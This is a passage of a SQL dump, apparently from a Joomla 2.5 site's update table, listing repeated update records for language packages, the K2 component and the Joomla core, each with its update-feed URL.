India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2757,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2758,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2759,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2760,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2761,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2762,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2763,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2764,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2765,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2766,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2767,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2768,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2769,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2770,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2771,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2772,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2773,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2774,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2775,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2776,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2777,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2778,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2779,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2780,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2781,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2782,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2783,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2784,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2785,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2786,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2787,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2788,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2789,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2790,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2791,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2792,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2793,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2794,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2795,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2796,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2797,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2798,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2799,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2800,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2801,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2802,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2803,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2804,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2805,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2806,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2807,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2808,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2809,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2810,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2811,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2812,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2813,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2814,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2815,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2816,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2817,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2818,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2819,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2820,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2821,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2822,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2823,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2824,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2825,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2826,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2827,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2828,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2829,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2830,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2831,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2832,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2833,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2834,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2835,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2836,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2837,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2838,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2839,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2840,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2841,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2842,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2843,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2844,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2845,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2846,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2847,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2848,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2849,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2850,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2851,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2852,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2853,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2854,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2855,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2856,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2857,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2858,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2859,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2860,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2861,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2862,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2863,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2864,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2865,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2866,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2867,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2868,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2869,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2870,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2871,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2872,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2873,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2874,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2875,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2876,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2877,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2878,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2879,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2880,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2881,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2882,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2883,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2884,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2885,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2886,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2887,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2888,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2889,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2890,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2891,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2892,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2893,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2894,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2895,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2896,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2897,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2898,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2899,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2900,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2901,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2902,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2903,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2904,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2905,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2906,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2907,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2908,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2909,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2910,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2911,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2912,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2913,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2914,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2915,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2916,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2917,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2918,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2919,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2920,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2921,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2922,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2923,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2924,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2925,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2926,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2927,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2928,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2929,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2930,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2931,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2932,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2933,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2934,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2935,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2936,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2937,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2938,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2939,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2940,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2941,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2942,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2943,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2944,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2945,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2946,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2947,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2948,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2949,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2950,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2951,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2952,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2953,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2954,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2955,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2956,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2957,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2958,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2959,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2960,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2961,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2962,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2963,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2964,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2965,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2966,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2967,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2968,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2969,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2970,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2971,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2972,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2973,3,0,0,'Arabic 